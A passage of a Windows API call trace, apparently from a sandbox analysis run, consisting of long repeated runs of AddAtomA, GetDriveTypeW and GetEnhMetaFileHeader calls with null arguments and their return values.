(lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.085] AddAtomA (lpString=0x0) returned 0x0 [0112.085] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.086] AddAtomA (lpString=0x0) returned 0x0 [0112.086] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.087] AddAtomA (lpString=0x0) returned 0x0 [0112.087] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.088] AddAtomA (lpString=0x0) returned 0x0 [0112.088] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.088] AddAtomA (lpString=0x0) returned 0x0 [0112.088] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.088] AddAtomA (lpString=0x0) returned 0x0 [0112.088] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.088] AddAtomA (lpString=0x0) returned 0x0 [0112.088] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.088] AddAtomA (lpString=0x0) returned 0x0 [0112.088] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.088] AddAtomA (lpString=0x0) returned 0x0 [0112.088] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.088] AddAtomA (lpString=0x0) returned 0x0 [0112.088] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.088] AddAtomA (lpString=0x0) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.089] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.090] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0112.091] GetEnhMetaFileHeader (in: 